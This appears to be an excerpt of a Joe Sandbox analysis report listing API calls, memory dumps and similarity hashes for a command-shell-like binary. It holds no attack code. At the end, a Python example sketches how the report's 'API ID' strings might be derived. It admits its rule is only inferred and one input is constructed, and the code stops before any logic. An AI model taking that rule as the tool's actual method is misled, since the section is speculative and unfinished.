• Opcode Fuzzy Hash: 3a72f03d0cb6879d893edea50ef486c4cba4b4037ebbbfb1845dd4082ec31f61
• Instruction Fuzzy Hash: FCA1E37290010A8BCB24DF64C8857FEB3B5EF54318F5454ADDA9AF7241EB319E86CB60
APIs
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(55099697,00000000,?), ref: 00F07710
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07722
  • Part of subcall function 00EEEC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
• towupper.MSVCRT ref: 00F078BC
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00F079F1
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00EE1F8C,00EE3B98), ref: 00F07B15
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,55099697,00000000,?), ref: 00F07D0D
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07D20
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
• String ID: %s $%s>$PROMPT$Unknown
• API String ID: 708651206-3050974680
• Opcode ID: cd694f87a81159579f5ef6d57083d06c05a89a915222174efe52d8644b3caa6a
• Instruction ID: 1a3bb354eb9009ea7fb259ea49e1457c2710ffe10b0b816227dbd6cfdcaa3a5d
• Opcode Fuzzy Hash: cd694f87a81159579f5ef6d57083d06c05a89a915222174efe52d8644b3caa6a
• Instruction Fuzzy Hash: 5A02D575E052198BCB24EF29CC496AAB7B5FF84310F14C1D9E409E7294EB306E82FB54
APIs
  • Part of subcall function 00F0C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00F0C14E
  • Part of subcall function 00F0C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00F0C16A
  • Part of subcall function 00F0C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00F0C17B
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00F0C24F
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00F0C270
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00F0C293
• RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00F0C2AE
• memset.MSVCRT ref: 00F0C2EF
• memcpy.MSVCRT(?,?,?), ref: 00F0C324
• memcpy.MSVCRT(?,00000000,?), ref: 00F0C370
• NtFsControlFile.NTDLL ref: 00F0C392
• RtlNtStatusToDosError.NTDLL ref: 00F0C39D
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F0C3A4
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00F0C3B6
• RtlFreeHeap.NTDLL ref: 00F0C3D1
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0C3E2
  • Part of subcall function 00F0C5F2: memset.MSVCRT ref: 00F0C62E
  • Part of subcall function 00F0C5F2: memset.MSVCRT ref: 00F0C656
  • Part of subcall function 00F0C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C6C7
  • Part of subcall function 00F0C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00F0C6E6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00F0C72A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 223857506-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e58bf4291eca39b92cf50feba3312a2ab891ae505b5fd16d3b042588f809e9e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a91c8e15f3bd3cc8745561130300722545752597133d1a03f936960bf30ae6e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e58bf4291eca39b92cf50feba3312a2ab891ae505b5fd16d3b042588f809e9e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6351B275A10209AFDB24DFB4CC05ABFB7B8EF48314B144269E902E7291E734DD01EBA0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE9342
                                                                                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE9356
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE936A
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE937E
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00EFBC07
                                                                                                                                                                                                                                                                                                                                                      • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00EFBD31
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                      • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 55602301-2516506544
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca4e3c9cc20daf42a36f6a9ea586d8b8678a10d855d5b5e832a064bdd082f085
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3409bdf28c3d5ebd1fd4697292df077c1fcea93c4b163e725499370c671edb70
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca4e3c9cc20daf42a36f6a9ea586d8b8678a10d855d5b5e832a064bdd082f085
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE81D476A0021D9BCF249F65CC45AFAB3B9AF84304F4451AAE609F7150EB319E82CB51
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?), ref: 00EF58BB
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF58CD
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF5944
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF594B
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF596C
                                                                                                                                                                                                                                                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF5973
                                                                                                                                                                                                                                                                                                                                                      • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF598F
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF59B6
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00F0160B
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00F01618
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3609286125-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b7d4d503b502ef1c7d11773e04e34902e12a7b9b3f99f0f71c80b1203dcf5137
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ca041f80386bd5a4f08236fbaee4b9f74a4770f334829059a88d404036d57e9a
• Opcode Fuzzy Hash: b7d4d503b502ef1c7d11773e04e34902e12a7b9b3f99f0f71c80b1203dcf5137
• Instruction Fuzzy Hash: B031A33220160CDFDB288F64DC09AB93BA5EB95335F255518E7A6D32E0DB719801FB11
APIs
• RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL(?,?,00000000,?), ref: 00EF4782
• NtOpenFile.NTDLL ref: 00EF47D4
• RtlReleaseRelativeName.NTDLL(?), ref: 00EF47E0
• RtlFreeUnicodeString.NTDLL(?), ref: 00EF47EA
  • Part of subcall function 00EF4823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00EF484F
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00EF480E
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00F0096F
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F0097D
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
• String ID: @
• API String ID: 2968197161-2766056989
• Opcode ID: 702fe94e7d8b1d4337962082c5bc5e95cf1a9f470296b4f29931612f5f24b514
• Instruction ID: cd6101d96e31b6671f580936e676eec9f5435417e5e840dea0f206b2660dd934
• Opcode Fuzzy Hash: 702fe94e7d8b1d4337962082c5bc5e95cf1a9f470296b4f29931612f5f24b514
• Instruction Fuzzy Hash: 812162B5D0020DAFDB20DFA5D944AEEB7B8EB44760F104165FA02F3291DB749E05AB60
APIs
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07483
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07495
• fprintf.MSVCRT ref: 00F074BB
• fflush.MSVCRT ref: 00F074C9
• TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F074E2
• NtCancelSynchronousIoFile.NTDLL ref: 00F074F8
• ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F074FF
• _get_osfhandle.MSVCRT ref: 00F0751C
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F07524
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
• String ID:
• API String ID: 3139166086-0
• Opcode ID: 17b13d97ae0f1a81b21df46891efdcb4fa6a77d017c8be6fcf94c7d9303f1aa1
• Instruction ID: afc472ea18ad73da6a01503e03b8c4a76a7e27d90b19ade2249b30df676aa4d2
• Opcode Fuzzy Hash: 17b13d97ae0f1a81b21df46891efdcb4fa6a77d017c8be6fcf94c7d9303f1aa1
• Instruction Fuzzy Hash: 2511D330D08308EFDB217B60EC0EBB97B69EF04765F084058F501950F1E7B59952FA62
APIs
• _setjmp3.MSVCRT ref: 00EE4E78
  • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• NtQueryInformationProcess.NTDLL ref: 00EE4F28
• NtSetInformationProcess.NTDLL ref: 00EE4F46
• NtSetInformationProcess.NTDLL ref: 00EE4FAE
• longjmp.MSVCRT(00F20A30,00000001,00000000), ref: 00EF91C8
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
• String ID: %9d$P,gw
• API String ID: 4212706909-1357659787
• Opcode ID: a6e642c1c3205e24b8b58e519b009b9e473229d69e58b0ccd8fd01bd348da890
• Instruction ID: e764fa7961cd7ecd82df3d9f3cb6a39b7ef9e0fc1a793ce4c3049223a5ef5c6e
• Opcode Fuzzy Hash: a6e642c1c3205e24b8b58e519b009b9e473229d69e58b0ccd8fd01bd348da890
• Instruction Fuzzy Hash: 754128B0E0535CAFD710DF6A9C05BAABBF4EB44714F11511AE610E72E1DBB08901EB91
APIs
  • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
  • Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00EF4C1A
  • Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00F00B39
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF4975
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00EF4ABC
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EF4AF4
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EF4AFF
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00EF4B28
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1068965577-3727491224
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c60334e7e8fd3a28074514e79adadeb1afb5b934d14b9d76b231256577b16a84
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0d2d0c2d7f2f8546ea496431cd7a326e00d037a95d6abc09815e81f95c8aeccd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c60334e7e8fd3a28074514e79adadeb1afb5b934d14b9d76b231256577b16a84
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D1D475B0021A8BCB28DF68C895BBBB3F1EF98314F554569D90AE72C1EA34ED41DB40
APIs
• memset.MSVCRT ref: 00EE7A9C
• memset.MSVCRT ref: 00EE7AC7
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00EE7BCA
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00EE7BDC
• longjmp.MSVCRT(00F20A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00EFAE5B
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$Heap$AllocProcesslongjmp
• String ID:
• API String ID: 2656838167-0
• Opcode ID: db2481512ab6660f92ded46b8647500035777118fa67d3111d0cd5f946ee2fc7
• Instruction ID: 18c210cf8b68ac5fec0e852438738b775a3f095eda791faaa1fac110e98f23cc
• Opcode Fuzzy Hash: db2481512ab6660f92ded46b8647500035777118fa67d3111d0cd5f946ee2fc7
• Instruction Fuzzy Hash: A8D1E5B090425D9BCB28DF25C8917BAF7B5BF04304F1860ADD64AB7681E770AE81CB95
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 2db095af38200b377484f67135295a8895ffd9d7af2aba5c2d40f05d7d6c7967
• Instruction ID: 818215c9f1f1d3df2516d48e320f03e98c735a01d45be307fdb3a91f89e7496d
• Opcode Fuzzy Hash: 2db095af38200b377484f67135295a8895ffd9d7af2aba5c2d40f05d7d6c7967
• Instruction Fuzzy Hash: 0CC1F6716043498BC714EF25C841A7AB7E2EFD8348F18992DF986AB391EB31DD41DB42
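The "API ID" in each Similarity block reads like a normalised multiset of API-name tokens: the function that references COPYCMD yields "_wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset", the heap-allocating one "memset$Heap$AllocProcesslongjmp". The Python below is an added example, not Joe Sandbox code: it reconstructs that derivation by inference from the listings on this page (drop mangled C++ symbols, strip a Get/Set prefix and a wide-char W suffix, split CamelCase into words, count the words, group by descending count, sort each group in ASCII order, join groups with "$"). The rule is an assumption that has been checked only against these listings; the numeric "API String ID" hash is not reproduced. The two listings are copied from this report with their argument lists shortened, and the EnterCriticalSection/LeaveCriticalSection input is constructed to match the third record's ID. The Jaccard comparison at the end is a plain similarity measure added for illustration, not the sandbox's own metric.

```python
import re
from collections import Counter
from itertools import groupby

# Added example, not Joe Sandbox code. The token rules below are inferred
# from the listings on this page and are an assumption, not a documented spec.

# API call listings copied from this report (argument lists shortened).
LISTING_COPYCMD = """
• Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
• Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
• Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
• Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
• Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00EF4C1A
• Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00F00B39
• memset.MSVCRT ref: 00EF4975
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00EF4ABC
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EF4AF4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EF4AFF
• ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00EF4B28
"""

LISTING_HEAP = """
• memset.MSVCRT ref: 00EE7A9C
• memset.MSVCRT ref: 00EE7AC7
• Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 00EEDCE1
• Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00EEDCE8
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00EE7BCA
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00EE7BDC
• longjmp.MSVCRT(00F20A30,00000001), ref: 00EFAE5B
"""

# One bullet per call; the API name is everything between the bullet (or the
# "Part of subcall function XXXX:" prefix) and the dot that precedes the module.
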